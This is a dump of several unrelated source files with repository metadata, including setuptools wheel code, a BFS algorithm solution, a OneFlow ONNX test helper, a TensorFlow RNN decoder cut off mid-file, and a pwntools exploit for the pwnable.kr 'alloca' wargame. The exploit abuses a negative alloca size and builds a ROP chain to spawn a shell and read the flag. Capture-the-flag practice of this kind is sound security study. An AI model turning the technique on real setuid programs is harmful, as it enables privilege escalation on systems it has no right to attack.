supported_tags = set((t.interpreter, t.abi, t.platform) for t in sys_tags())
return next((True for t in self.tags() if t in supported_tags), False)
def egg_name(self):
return pkg_resources.Distribution(
project_name=self.project_name, version=self.version,
platform=(None if self.platform == 'any' else get_platform()),
).egg_name() + '.egg'
def get_dist_info(self, zf):
# find the correct name of the .dist-info dir in the wheel file
for member in zf.namelist():
dirname = posixpath.dirname(member)
if (dirname.endswith('.dist-info') and
canonicalize_name(dirname).startswith(
canonicalize_name(self.project_name))):
return dirname
raise ValueError("unsupported wheel format. .dist-info not found")
def install_as_egg(self, destination_eggdir):
'''Install wheel as an egg directory.'''
with zipfile.ZipFile(self.filename) as zf:
self._install_as_egg(destination_eggdir, zf)
def _install_as_egg(self, destination_eggdir, zf):
dist_basename = '%s-%s' % (self.project_name, self.version)
dist_info = self.get_dist_info(zf)
dist_data = '%s.data' % dist_basename
egg_info = os.path.join(destination_eggdir, 'EGG-INFO')
self._convert_metadata(zf, destination_eggdir, dist_info, egg_info)
self._move_data_entries(destination_eggdir, dist_data)
self._fix_namespace_packages(egg_info, destination_eggdir)
@staticmethod
def _convert_metadata(zf, destination_eggdir, dist_info, egg_info):
def get_metadata(name):
with zf.open(posixpath.join(dist_info, name)) as fp:
value = fp.read().decode('utf-8') if PY3 else fp.read()
return email.parser.Parser().parsestr(value)
wheel_metadata = get_metadata('WHEEL')
# Check wheel format version is supported.
wheel_version = parse_version(wheel_metadata.get('Wheel-Version'))
wheel_v1 = (
parse_version('1.0') <= wheel_version < parse_version('2.0dev0')
)
if not wheel_v1:
raise ValueError(
'unsupported wheel format version: %s' % wheel_version)
# Extract to target directory.
os.mkdir(destination_eggdir)
zf.extractall(destination_eggdir)
# Convert metadata.
dist_info = os.path.join(destination_eggdir, dist_info)
dist = pkg_resources.Distribution.from_location(
destination_eggdir, dist_info,
metadata=pkg_resources.PathMetadata(destination_eggdir, dist_info),
)
# Note: Evaluate and strip markers now,
# as it's difficult to convert back from the syntax:
# foobar; "linux" in sys_platform and extra == 'test'
def raw_req(req):
req.marker = None
return str(req)
install_requires = list(sorted(map(raw_req, dist.requires())))
extras_require = {
extra: sorted(
req
for req in map(raw_req, dist.requires((extra,)))
if req not in install_requires
)
for extra in dist.extras
}
os.rename(dist_info, egg_info)
os.rename(
os.path.join(egg_info, 'METADATA'),
os.path.join(egg_info, 'PKG-INFO'),
)
setup_dist = setuptools.Distribution(
attrs=dict(
install_requires=install_requires,
extras_require=extras_require,
),
)
# Temporarily disable info traces.
log_threshold = log._global_log.threshold
log.set_threshold(log.WARN)
try:
write_requirements(
setup_dist.get_command_obj('egg_info'),
None,
os.path.join(egg_info, 'requires.txt'),
)
finally:
log.set_threshold(log_threshold)
@staticmethod
def _move_data_entries(destination_eggdir, dist_data):
"""Move data entries to their correct location."""
dist_data = os.path.join(destination_eggdir, dist_data)
dist_data_scripts = os.path.join(dist_data, 'scripts')
if os.path.exists(dist_data_scripts):
egg_info_scripts = os.path.join(
destination_eggdir, 'EGG-INFO', 'scripts')
os.mkdir(egg_info_scripts)
for entry in os.listdir(dist_data_scripts):
# Remove bytecode, as it's not properly handled
# during easy_install scripts install phase.
if entry.endswith('.pyc'):
os.unlink(os.path.join(dist_data_scripts, entry))
else:
os.rename(
os.path.join(dist_data_scripts, entry),
os.path.join(egg_info_scripts, entry),
)
os.rmdir(dist_data_scripts)
for subdir in filter(os.path.exists, (
os.path.join(dist_data, d)
for d in ('data', 'headers', 'purelib', 'platlib')
)):
unpack(subdir, destination_eggdir)
if os.path.exists(dist_data):
os.rmdir(dist_data)
@staticmethod
def _fix_namespace_packages(egg_info, destination_eggdir):
namespace_packages = os.path.join(
egg_info, 'namespace_packages.txt')
if os.path.exists(namespace_packages):
with open(namespace_packages) as fp:
namespace_packages = fp.read().split()
for mod in namespace_packages:
mod_dir = os.path.join(destination_eggdir, *mod.split('.'))
mod_init = os.path.join(mod_dir, '__init__.py')
if not os.path.exists(mod_dir):
os.mkdir(mod_dir)
if not os.path.exists(mod_init):
with open(mod_init, 'w') as fp:
fp.write(NAMESPACE_PACKAGE_INIT)
| [
"[email protected]"
] | |
699eda9c9fa27436875646f3e48e3a68b554030c | 94923becbb06260e3cd35dde46c3d1688c9f7feb | /wargames/pwnablekr/rookiss/alloca/win.py | b41641d53ba295cd19ff532a9f6708165421a956 | [
"MIT"
] | permissive | infernalheaven/examples | b1826d521b04ea5bf55c7c2b5a6cc620df59cfe9 | a3a3bfe2a7b9addea94396f21b73252c3bd56d49 | refs/heads/master | 2021-01-11T10:58:10.794931 | 2016-10-05T22:56:39 | 2016-10-05T22:56:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,582 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
host = 'pwnable.kr'
user = 'alloca'
password = 'guest'
binary = '/home/%s/%s' % (user,user)
chal = os.path.basename(binary)
shell = ssh(host=host, user=user, password=password, port=2222)
if not os.path.exists(chal):
shell.download_file(binary)
shell.download_file(binary + '.c')
os.chmod(chal, 0755)
#
# Disable ASLR so that DSO addresses are constant.
#
context.aslr = False
#
# Using a negative value for alloca allows us to overwrite the saved value
# of ESP on the stack.
#
# The offset which gives us this control is -92, though -88 through -96 also
# work.
#
# Because of the way things work out, the stack value will be XORed with
# some random stack trash. On the up-side, it is consistent from run-to-run.
# On the downside, it is not consistent between different versions of libc.
#
# In order to have a portable exploit (works locally and remotely), we will
# force the target binary to crash once, and scrape the value of ESP at the
# segfault by loading a corefile.
#
# In order for a corefile to drop, we have to be in a writable directory
shell.set_working_directory()
shell('ln -s %s .' % binary)
#
# Launch the process, and let it die a terrible death
#
# Note that we need the setuid bit to be ignored in order for a corefile we
# can use to be dropped.
#
p = shell.process('./alloca',
setuid=0)
address = 0xdeadbeef
cookie = str(signed(address))
pattern = cyclic(64)
data = fit({0: '-92',
16: cookie,
32: pattern},
filler='\n')
#
# All of the data should be sent at the same time, so that it is all
# buffered at once. The fgets() is actually a noop since the value is negative.
#
# We are relying on the buffering behavior of scanf().
#
p.sendline(data)
p.recvall()
# Grab the corefile after it's written. It may take a second or two to appear.
pause(2)
shell.download('core')
core = Core('core')
# We want to be sure that we crashed at the 'ret'
# Either we'll crash at that instruction (stack pointer is invalid)
# or at zero (stack pointer was valid, pointed at an empty page).
assert core.eip in (0x804878a, 0)
# Find out the XOR value. This is almost-always constant, but varies by 1 bit
# on the pwnable.kr server as of writing. Luckily, the 1 bit that changes is
# the '4' bit, so as long as we pad an extra 'ret' in our ROP, we're fine.
xor = address ^ core.esp
log.info("%08x xor magic" % xor)
# Find our data in the heap
address = core.search(pattern).next()
log.info("%08x heap address" % address)
#
# We need a bit of a RET sled because the XOR value isn't perfectly constant,
# but only varies by a small amount which we can account for.
#
libc = p.libc
rop = ROP(libc)
log.info("libc is at %#x" % libc.address)
binsh = libc.search('/bin/sh\x00').next()
rop.raw(rop.ret)
rop.raw(rop.ret)
rop.raw(rop.ret)
rop.raw(rop.ret)
rop.execve(binsh,0,0)
log.info(rop.dump())
# Shoot for the middle of the RET sled
address += 8
# One very last time, to pwn it proper!
cookie = str(signed(address ^ xor))
data = fit({0: '-92',
16: cookie,
32: str(rop)},
filler='\n')
p = shell.process('./alloca')
# shell.upload('~/bin/gdbserver')
# shell('chmod +x gdbserver')
# p = gdb.debug('./alloca', '''
# break *0x804878a
# set follow-fork-mode child
# catch exec
# continue
# ''', ssh=shell)
p.sendline(data)
p.recvuntil('$')
p.clean()
p.sendline('cat /home/alloca/flag')
flag = p.recvline().strip()
log.success('Flag: %r' % flag)
p.interactive(prompt='')
| [
"[email protected]"
] | |
95c8d89866be1ab21e245c5c39170e3918f41ece | 78c4ccb183a99ebaabcdc3a3a69f029e4aee0f5c | /AlgorithmStudy/백준/무지성 랜덤풀이/9월/9.27/13549 숨바꼭질3.py | e0e130cd47181bea752f97e6b07942782346f798 | [] | no_license | cladren123/study | ef2c45bc489fa658dbc9360fb0b0de53250500e5 | 241326e618f1f3bb1568d588bf6f53b78920587a | refs/heads/master | 2023-09-02T02:21:24.560967 | 2021-11-05T12:20:06 | 2021-11-05T12:20:06 | 368,753,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,339 | py | """
Problem types:
graph theory
graph traversal
breadth-first search
Dijkstra
0-1 breadth-first search
Initially got a time-limit-exceeded verdict.
Bounding the positions and discarding anything that falls outside the range solved it.
"""
import sys
from collections import deque
input = sys.stdin.readline
# n: Subin's position, m: the sibling's position
n, m = map(int, input().split())
# exclusive upper bound on valid positions
maxnum = 100001
# timelist[x] holds the earliest time at which position x is reached
timelist = [-1] * maxnum
# visited[x] marks whether position x has already been enqueued
visited = [0] * maxnum
# initialising the start state matters too; skipping it causes errors
que = deque()
que.append(n)
timelist[n] = 0
visited[n] = 1
while que :
loc = que.popleft()
    # the *2 move costs no time, so push it to the front so it is explored first
if loc*2 < maxnum and visited[loc*2] == 0 :
timelist[loc*2] = timelist[loc]
visited[loc*2] = 1
que.appendleft(loc*2)
    # the +1 move (costs 1 second)
if loc+1 < maxnum and visited[loc+1] == 0 :
visited[loc+1] = 1
timelist[loc+1] = timelist[loc] + 1
que.append(loc+1)
    # the -1 move (costs 1 second)
if loc-1 >= 0 and visited[loc-1] == 0 :
visited[loc-1] = 1
timelist[loc-1] = timelist[loc] + 1
que.append(loc-1)
print(timelist[m])
| [
"[email protected]"
] | |
c87601687dd5c7c65e20dba92b239e070261b317 | 3670f46666214ef5e1ce6765e47b24758f3614a9 | /oneflow/python/test/onnx/util.py | d2222f7d6b30cad257fa79d950b134ab33ead31c | [
"Apache-2.0"
] | permissive | ashing-zhang/oneflow | 0b8bb478ccd6cabea2dca0864defddab231919bf | 70db228a4d361c916f8f8d85e908795b479e5d20 | refs/heads/master | 2022-12-14T21:13:46.752535 | 2020-09-07T03:08:52 | 2020-09-07T03:08:52 | 293,535,931 | 1 | 0 | Apache-2.0 | 2020-09-07T13:28:25 | 2020-09-07T13:28:24 | null | UTF-8 | Python | false | false | 2,994 | py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
import oneflow as flow
import onnxruntime as ort
import onnx
from collections import OrderedDict
import tempfile
import os
import shutil
def convert_to_onnx_and_check(
job_func,
print_outlier=False,
explicit_init=True,
external_data=False,
ort_optimize=True,
opset=None,
):
check_point = flow.train.CheckPoint()
if explicit_init:
# it is a trick to keep check_point.save() from hanging when there is no variable
@flow.global_function(flow.FunctionConfig())
def add_var():
return flow.get_variable(
name="trick",
shape=(1,),
dtype=flow.float,
initializer=flow.random_uniform_initializer(),
)
check_point.init()
flow_weight_dir = tempfile.TemporaryDirectory()
check_point.save(flow_weight_dir.name)
# TODO(daquexian): a more elegant way?
while not os.path.exists(os.path.join(flow_weight_dir.name, "snapshot_done")):
pass
onnx_model_dir = tempfile.TemporaryDirectory()
onnx_model_path = os.path.join(onnx_model_dir.name, "model.onnx")
flow.onnx.export(
job_func,
flow_weight_dir.name,
onnx_model_path,
opset=opset,
external_data=external_data,
)
flow_weight_dir.cleanup()
ort_sess_opt = ort.SessionOptions()
ort_sess_opt.graph_optimization_level = (
ort.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
if ort_optimize
else ort.GraphOptimizationLevel.ORT_DISABLE_ALL
)
sess = ort.InferenceSession(onnx_model_path, sess_options=ort_sess_opt)
onnx_model_dir.cleanup()
assert len(sess.get_outputs()) == 1
assert len(sess.get_inputs()) <= 1
ipt_dict = OrderedDict()
for ipt in sess.get_inputs():
ipt_data = np.random.uniform(low=-10, high=10, size=ipt.shape).astype(
np.float32
)
ipt_dict[ipt.name] = ipt_data
onnx_res = sess.run([], ipt_dict)[0]
oneflow_res = job_func(*ipt_dict.values()).get().numpy()
rtol, atol = 1e-2, 1e-5
if print_outlier:
a = onnx_res.flatten()
b = oneflow_res.flatten()
for i in range(len(a)):
if np.abs(a[i] - b[i]) > atol + rtol * np.abs(b[i]):
print("a[{}]={}, b[{}]={}".format(i, a[i], i, b[i]))
assert np.allclose(onnx_res, oneflow_res, rtol=rtol, atol=atol)
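# Minimal usage sketch (hypothetical job function; the decorator style and
# typing helpers are assumptions about the OneFlow API version in use, not
# taken from this file):
#
# @flow.global_function(flow.FunctionConfig())
# def relu_job(x: flow.typing.Numpy.Placeholder((2, 3))) -> flow.typing.Numpy:
#     return flow.math.relu(x)
#
# convert_to_onnx_and_check(relu_job)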
| [
"[email protected]"
] | |
a6e84ede469fbe72771be78c555a5612ccf2e137 | 492d3e666b87eff971628a74fe13facde01e2949 | /htmlcov/_python_Django_My Projects_student-portal_Lib_site-packages_ckeditor_uploader_backends___init___py.html.py | 798d55fc791e5536bdf76c670715ec7c0d91fbb8 | [] | no_license | OmarFateh/Student-Portal | 42050da15327aa01944dc79b5e00ca34deb51531 | 167ffd3a4183529c0cbc5db4ab232026711ea915 | refs/heads/master | 2023-06-13T01:03:16.475588 | 2021-07-08T11:09:09 | 2021-07-08T11:09:09 | 382,895,837 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,201 | py | XXXXXXXXX XXXXX
| [
"[email protected]"
] | |
cec1ac5c978a20fda316ddf1475bffc7cc5c0a85 | b91578b96ffe63639d3efc70d4737b92091cd0b1 | /backend/unpp_api/apps/sanctionslist/serializers.py | 3d57ed5f866b73fbe8dde2953857e5e283fedb35 | [
"Apache-2.0"
] | permissive | unicef/un-partner-portal | 876b6ec394909ed2f72777493623413e9cecbfdc | 73afa193a5f6d626928cae0025c72a17f0ef8f61 | refs/heads/develop | 2023-02-06T21:08:22.037975 | 2019-05-20T07:35:29 | 2019-05-20T07:35:29 | 96,332,233 | 6 | 1 | Apache-2.0 | 2023-01-25T23:21:41 | 2017-07-05T15:07:44 | JavaScript | UTF-8 | Python | false | false | 633 | py | from rest_framework import serializers
from sanctionslist.models import SanctionedNameMatch
class SanctionedNameMatchSerializer(serializers.ModelSerializer):
sanctioned_type = serializers.CharField(source='name.item.sanctioned_type', read_only=True)
sanctioned_type_display = serializers.CharField(source='name.item.get_sanctioned_type_display', read_only=True)
match_type_display = serializers.CharField(source='get_match_type_display', read_only=True)
class Meta:
model = SanctionedNameMatch
exclude = (
'partner',
'can_ignore',
'can_ignore_text',
)
| [
"[email protected]"
] | |
699217857bdbf1f709123b843e8bbc301dfeee0a | a859aadea24af173a175c2d01910314487ec6fbf | /common/ops_rnn_v2.py | acd3ae1ce052c94ce4a70df353ea57d9d33f42f4 | [
"BSD-3-Clause"
] | permissive | jiahuei/tf-sparse-captioning | cc52cbef5590b47727ea89f265011c9ab58aebad | 9d7b8ecdd44fb1541500ca4f920d6c94fd15bad1 | refs/heads/main | 2023-04-07T05:27:28.395758 | 2021-04-19T11:27:28 | 2021-04-19T11:27:28 | 359,341,665 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 34,951 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 27 16:22:42 2017
@author: jiahuei
"""
# import numpy as np
import logging
import tensorflow as tf
# from tensorflow.python.framework import ops
# from tensorflow.python.ops import rnn_cell_impl
from tensorflow.contrib.seq2seq.python.ops.beam_search_decoder import _check_batch_beam, gather_tree_from_array
from tensorflow.contrib.seq2seq.python.ops import attention_wrapper
from tensorflow.python.layers.core import Dense
# from tensorflow.python.layers import base
# from tensorflow.python.framework import dtypes
# from common.mask_prune import sampler
from common.mask_prune import masked_layer
from common.ops_v1 import layer_norm_activate, dprint
from common.ops_v1 import shape as _shape
# from packaging import version
AttentionWrapperState = tf.contrib.seq2seq.AttentionWrapperState
logger = logging.getLogger(__name__)
_DEBUG = False
def _dprint(string):
return dprint(string, _DEBUG)
def _layer_norm_tanh(tensor):
# if version.parse(tf.__version__) >= version.parse('1.9'):
try:
tensor = layer_norm_activate(
'LN_tanh',
tensor,
tf.nn.tanh,
begin_norm_axis=-1)
except TypeError:
tensor_s = _shape(tensor)
tensor = layer_norm_activate(
'LN_tanh',
tf.reshape(tensor, [-1, tensor_s[-1]]),
tf.nn.tanh)
tensor = tf.reshape(tensor, tensor_s)
return tensor
###############################################################################
def rnn_decoder_beam_search(cell,
embedding_fn,
output_layer,
batch_size,
beam_size,
length_penalty_weight,
maximum_iterations,
start_id,
end_id,
swap_memory=True):
"""
Dynamic RNN loop function for inference. Performs beam search.
Operates in time-major mode.
Args:
cell: An `RNNCell` instance (with or without attention).
embedding_fn: Either embedding Variable or embedding function.
output_layer: An instance of `tf.layers.Layer`, i.e.,
`tf.layers.Dense`. Layer to apply to the RNN output prior to
storing the result or sampling. Pass `None` to disable it.
batch_size: Int scalar. Size of batch.
        beam_size: Int scalar. Size of beam for beam search.
length_penalty_weight: Float weight to penalise length.
Disabled with 0.0.
maximum_iterations: Int scalar. Maximum number of decoding steps.
start_id: `int32` scalar, the token that marks start of decoding.
end_id: `int32` scalar, the token that marks end of decoding.
swap_memory: Python bool, whether GPU-CPU memory swap is enabled.
Argument passed to `tf.while_loop`.
Returns:
        predicted_ids, scores, cell_state of the final BeamSearchDecoderState
"""
logger.debug('Building subgraph V4 for Beam Search.')
state_init = cell.zero_state(batch_size * beam_size, tf.float32)
start_ids = tf.tile([start_id], multiples=[batch_size])
_dprint('rnn_decoder_beam_search: Initial state: {}'.format(state_init))
_dprint('rnn_decoder_beam_search: Cell state size: {}'.format(cell.state_size))
# decoder = tf.contrib.seq2seq.BeamSearchDecoder(
decoder = BeamSearchDecoderMultiHead(
cell=cell,
embedding=embedding_fn,
start_tokens=start_ids,
end_token=end_id,
initial_state=state_init,
beam_width=beam_size,
output_layer=output_layer,
length_penalty_weight=length_penalty_weight,
reorder_tensor_arrays=True) # r1.9 API
dec_outputs, dec_states, _ = tf.contrib.seq2seq.dynamic_decode(
decoder=decoder,
output_time_major=True,
impute_finished=False,
maximum_iterations=maximum_iterations,
parallel_iterations=1,
swap_memory=swap_memory)
_dprint('rnn_decoder_beam_search: Final BeamSearchDecoderState: {}'.format(dec_states))
# `dec_outputs` will be a `FinalBeamSearchDecoderOutput` object
# `dec_states` will be a `BeamSearchDecoderState` object
predicted_ids = dec_outputs.predicted_ids # (time, batch_size, beam_size)
scores = dec_outputs.beam_search_decoder_output.scores # (time, batch_size, beam_size)
# top_sequence = predicted_ids[:, :, 0]
# top_score = scores[:, :, 0] # log-softmax scores
return predicted_ids, scores, dec_states.cell_state
def rnn_decoder_search(cell,
embedding_fn,
output_layer,
batch_size,
maximum_iterations,
start_id,
end_id,
swap_memory=True,
greedy_search=True):
"""
Dynamic RNN loop function for inference. Performs greedy search / sampling.
Operates in time-major mode.
Args:
cell: An `RNNCell` instance (with or without attention).
embedding_fn: A callable that takes a vector tensor of `ids`
(argmax ids), or the `params` argument for `embedding_lookup`.
The returned tensor will be passed to the decoder input.
output_layer: An instance of `tf.layers.Layer`, i.e.,
`tf.layers.Dense`. Layer to apply to the RNN output prior to
storing the result or sampling. Pass `None` to disable it.
batch_size: Int scalar. Size of batch.
maximum_iterations: Int scalar. Maximum number of decoding steps.
start_id: `int32` scalar, the token that marks start of decoding.
end_id: `int32` scalar, the token that marks end of decoding.
swap_memory: Python bool, whether GPU-CPU memory swap is enabled.
Argument passed to `tf.while_loop`.
greedy_search: Python bool, use argmax if True, sample from
distribution if False.
Returns:
output_ids, rnn_outputs, decoder_state
"""
# Initialise `AttentionWrapperState` with provided RNN state
state_init = cell.zero_state(batch_size, tf.float32)
start_ids = tf.tile([start_id], multiples=[batch_size])
_dprint('rnn_decoder_search: Initial state: {}'.format(state_init))
_dprint('rnn_decoder_search: Cell state size: {}'.format(cell.state_size))
if greedy_search:
logger.debug('Building subgraph V4 for Greedy Search.')
helper_fn = tf.contrib.seq2seq.GreedyEmbeddingHelper
else:
logger.debug('Building subgraph V4 for Sample Search.')
helper_fn = tf.contrib.seq2seq.SampleEmbeddingHelper
helper = helper_fn(
embedding=embedding_fn,
start_tokens=start_ids,
end_token=end_id)
decoder = tf.contrib.seq2seq.BasicDecoder(
cell=cell,
helper=helper,
initial_state=state_init,
output_layer=output_layer)
dec_outputs, dec_states, _ = tf.contrib.seq2seq.dynamic_decode(
decoder=decoder,
output_time_major=True,
impute_finished=False,
maximum_iterations=maximum_iterations,
parallel_iterations=1,
swap_memory=swap_memory)
# `dec_outputs` will be a `BasicDecoderOutput` object
# `dec_states` may be a `AttentionWrapperState` object
rnn_out = dec_outputs.rnn_output
output_ids = dec_outputs.sample_id
return output_ids, rnn_out, dec_states
def rnn_decoder_training(cell,
embeddings,
output_layer,
batch_size,
sequence_length,
swap_memory=True):
"""
Dynamic RNN loop function for training. Operates in time-major mode.
The decoder will run until <EOS> token is encountered.
Args:
cell: An `RNNCell` instance (with or without attention).
embeddings: A float32 tensor of shape [time, batch, word_size].
output_layer: An instance of `tf.layers.Layer`, i.e.,
`tf.layers.Dense`. Layer to apply to the RNN output prior to
storing the result or sampling. Pass `None` to disable it.
batch_size: Int scalar. Size of batch.
sequence_length: An int32 vector tensor. Length of sequence.
swap_memory: Python bool, whether GPU-CPU memory swap is enabled.
Argument passed to `tf.while_loop`.
Returns:
output_ids, rnn_outputs, decoder_state
"""
logger.debug('Building dynamic decode subgraph V4 for training.')
# Initialise `AttentionWrapperState` with provided RNN state
# batch_size = tf.shape(embeddings)[1]
state_init = cell.zero_state(batch_size, tf.float32)
_dprint('rnn_decoder_training: Initial state: {}'.format(state_init))
_dprint('rnn_decoder_training: Cell state size: {}'.format(cell.state_size))
helper = tf.contrib.seq2seq.TrainingHelper(
inputs=embeddings,
sequence_length=sequence_length,
time_major=True)
decoder = tf.contrib.seq2seq.BasicDecoder(
cell=cell,
helper=helper,
initial_state=state_init,
output_layer=output_layer)
dec_outputs, dec_states, _ = tf.contrib.seq2seq.dynamic_decode(
decoder=decoder,
output_time_major=True,
impute_finished=True,
maximum_iterations=None,
parallel_iterations=1,
swap_memory=swap_memory)
# `dec_outputs` will be a `BasicDecoderOutput` object
# `dec_states` may be a `AttentionWrapperState` object
rnn_out = dec_outputs.rnn_output
output_ids = dec_outputs.sample_id
# Perform padding by copying elements from the last time step.
# This is required if `impute_finished` is True.
# This is skipped in inference mode.
pad_time = tf.shape(embeddings)[0] - tf.shape(rnn_out)[0]
pad = tf.tile(rnn_out[-1:, :, :], [pad_time, 1, 1])
rnn_out = tf.concat([rnn_out, pad], axis=0) # (max_time, batch_size, rnn_size)
pad_ids = tf.tile(output_ids[-1:, :], [pad_time, 1])
output_ids = tf.concat([output_ids, pad_ids], axis=0) # (max_time, batch_size)
return output_ids, rnn_out, dec_states
def split_heads(x, num_heads):
"""Split channels (dimension 3) into multiple heads (becomes dimension 1).
Args:
x: a Tensor with shape [batch, length, channels]
num_heads: an integer
Returns:
a Tensor with shape [batch, num_heads, length, channels / num_heads]
"""
old_shape = _shape(x)
last = old_shape[-1]
new_shape = old_shape[:-1] + [num_heads] + [last // num_heads if last else -1]
# new_shape = tf.concat([old_shape[:-1], [num_heads, last // num_heads]], 0)
return tf.transpose(tf.reshape(x, new_shape, 'split_head'), [0, 2, 1, 3])
def combine_heads(x):
"""Inverse of split_heads.
Args:
x: a Tensor with shape [batch, num_heads, length, channels / num_heads]
Returns:
a Tensor with shape [batch, length, channels]
"""
x = tf.transpose(x, [0, 2, 1, 3])
old_shape = _shape(x)
a, b = old_shape[-2:]
new_shape = old_shape[:-2] + [a * b if a and b else -1]
# l = old_shape[2]
# c = old_shape[3]
# new_shape = tf.concat([old_shape[:-2] + [l * c]], 0)
return tf.reshape(x, new_shape, 'combine_head')
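# Shape sketch with illustrative numbers: split_heads on a [8, 49, 512] tensor
# with num_heads=4 yields [8, 4, 49, 128]; combine_heads maps that back to
# [8, 49, 512], so combine_heads(split_heads(x, n)) recovers x.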
###############################################################################
# noinspection PyProtectedMember
class MultiHeadAttV3(attention_wrapper._BaseAttentionMechanism):
"""
Implements multi-head attention.
"""
# TODO: bookmark
# noinspection PyCallingNonCallable
def __init__(self,
num_units,
feature_map,
fm_projection,
num_heads=None,
scale=True,
memory_sequence_length=None,
probability_fn=tf.nn.softmax,
mask_type=None,
mask_init_value=0,
mask_bern_sample=False,
name='MultiHeadAttV3'):
"""
Construct the AttentionMechanism mechanism.
Args:
num_units: The depth of the attention mechanism.
feature_map: The feature map / memory to query. This tensor
should be shaped `[batch_size, height * width, channels]`.
fm_projection: Feature map projection mode.
num_heads: Int, number of attention heads. (optional)
scale: Python boolean. Whether to scale the energy term.
memory_sequence_length: Tensor indicating sequence length.
probability_fn: (optional) A `callable`. Converts the score
to probabilities. The default is `tf.nn.softmax`.
name: Name to use when creating ops.
"""
logger.debug('Using MultiHeadAttV3.')
assert fm_projection in [None, 'independent', 'tied']
# if memory_sequence_length is not None:
# assert len(_shape(memory_sequence_length)) == 2, \
# '`memory_sequence_length` must be a rank-2 tensor, ' \
# 'shaped [batch_size, num_heads].'
if mask_type is None:
self._dense_layer = Dense
self._mask_params = {}
else:
self._dense_layer = masked_layer.MaskedDense
self._mask_params = dict(mask_type=mask_type,
mask_init_value=mask_init_value,
mask_bern_sample=mask_bern_sample)
super(MultiHeadAttV3, self).__init__(
query_layer=self._dense_layer(units=num_units, name='query_layer', use_bias=False, **self._mask_params),
# query is projected hidden state
memory_layer=self._dense_layer(units=num_units, name='memory_layer', use_bias=False, **self._mask_params),
# self._keys is projected feature_map
memory=feature_map, # self._values is feature_map
probability_fn=lambda score, _: probability_fn(score),
memory_sequence_length=None,
score_mask_value=float('-inf'),
name=name)
self._probability_fn = lambda score, _: (
probability_fn(
self._maybe_mask_score_multi(
score, memory_sequence_length, float('-inf'))))
self._fm_projection = fm_projection
self._num_units = num_units
self._num_heads = num_heads
self._scale = scale
self._feature_map_shape = _shape(feature_map)
self._name = name
if fm_projection == 'tied':
assert num_units % num_heads == 0, \
'For `tied` projection, attention size/depth must be ' \
'divisible by the number of attention heads.'
self._values_split = split_heads(self._keys, self._num_heads)
elif fm_projection == 'independent':
assert num_units % num_heads == 0, \
                'For `independent` projection, attention size/depth must be ' \
'divisible by the number of attention heads.'
# Project and split memory
v_layer = self._dense_layer(units=num_units, name='value_layer', use_bias=False, **self._mask_params)
# (batch_size, num_heads, mem_size, num_units / num_heads)
self._values_split = split_heads(v_layer(self._values), self._num_heads)
else:
assert _shape(self._values)[-1] % num_heads == 0, \
'For `none` projection, feature map channel dim size must ' \
'be divisible by the number of attention heads.'
self._values_split = split_heads(self._values, self._num_heads)
_dprint('{}: FM projection type: {}'.format(
self.__class__.__name__, fm_projection))
_dprint('{}: Splitted values shape: {}'.format(
self.__class__.__name__, _shape(self._values_split)))
_dprint('{}: Values shape: {}'.format(
self.__class__.__name__, _shape(self._values)))
_dprint('{}: Keys shape: {}'.format(
self.__class__.__name__, _shape(self._keys)))
_dprint('{}: Feature map shape: {}'.format(
self.__class__.__name__, _shape(feature_map)))
@property
def values_split(self):
return self._values_split
def initial_alignments(self, batch_size, dtype):
"""Creates the initial alignment values for the `AttentionWrapper` class.
This is important for AttentionMechanisms that use the previous alignment
to calculate the alignment at the next time step (e.g. monotonic attention).
The default behavior is to return a tensor of all zeros.
Args:
batch_size: `int32` scalar, the batch_size.
dtype: The `dtype`.
Returns:
A `dtype` tensor shaped `[batch_size, alignments_size]`
(`alignments_size` is the values' `max_time`).
"""
del batch_size
s = _shape(self.values_split)[:-1]
init = tf.zeros(shape=[s[0], s[1] * s[2]], dtype=dtype)
_dprint('{}: Initial alignments shape: {}'.format(self.__class__.__name__, _shape(init)))
return init
def _maybe_mask_score_multi(self,
score,
memory_sequence_length,
score_mask_value):
if memory_sequence_length is None:
return score
        message = 'All values in memory_sequence_length must be greater than zero.'
with tf.control_dependencies(
[tf.assert_positive(memory_sequence_length, message=message)]):
            _dprint('{}: unmasked score shape: {}'.format(self.__class__.__name__, _shape(score)))
score_mask = tf.sequence_mask(
memory_sequence_length, maxlen=tf.shape(score)[2])
score_mask_values = score_mask_value * tf.ones_like(score)
masked_score = tf.where(score_mask, score, score_mask_values)
_dprint('{}: score shape: {}'.format(
self.__class__.__name__, _shape(score)))
_dprint('{}: masked_score shape: {}'.format(
self.__class__.__name__, _shape(masked_score)))
return masked_score
class MultiHeadAddLN(MultiHeadAttV3):
"""
Implements Toronto-style (Xu et al.) attention scoring with layer norm,
as described in:
"Show, Attend and Tell: Neural Image Caption Generation with
Visual Attention." ICML 2015. https://arxiv.org/abs/1502.03044
"""
def __call__(self, query, state):
"""
Score the query based on the keys and values.
Args:
query: RNN hidden state. Tensor of shape `[batch_size, num_units]`.
state: IGNORED. Previous alignment values.
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
del state
with tf.variable_scope(None, 'multi_add_attention', [query]):
# Reshape from [batch_size, ...] to [batch_size, 1, ...] for broadcasting.
proj_query = tf.expand_dims(self.query_layer(query), 1)
v = tf.get_variable(
'attention_v', [self._num_units], dtype=proj_query.dtype)
if len(self._mask_params) > 0:
v, _ = masked_layer.generate_masks(kernel=v, bias=None,
dtype=proj_query.dtype,
**self._mask_params)
score = self._keys + proj_query
score = _layer_norm_tanh(score)
score = tf.multiply(score, v)
score = split_heads(score, self._num_heads) # (batch_size, num_heads, mem_size, num_units / num_heads)
score = tf.reduce_sum(score, axis=3) # (batch_size, num_heads, mem_size)
if self._scale:
softmax_temperature = tf.get_variable(
'softmax_temperature',
shape=[],
